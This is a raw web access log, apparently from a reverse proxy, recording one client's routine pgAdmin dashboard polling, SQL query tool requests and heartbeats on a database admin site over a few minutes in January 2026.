[Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:35 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:36 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:36 +0000] - 500 500 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 222] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:36 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:37 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:39 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:41 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:43 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:45 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:45 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:47 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:49 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:50 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:51 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:55 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:03:57 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:58 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:03:59 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:00 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:01 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:03 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:03 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:03 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:04 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:05 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:05 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:05 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:05 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:07 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:09 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:10 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:10 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:10 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:11 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:11 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:13 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:14 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:14 +0000] - 500 500 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 222] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:14 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:15 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:17 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:19 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:21 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:04:26 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:31 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:36 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:36 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:46 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:51 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:04:56 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:05:01 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:05:06 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:05:06 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:05:11 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:05:16 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:05:21 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:05:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:05:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:06:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:06:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:06:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:23 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:07:23 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" 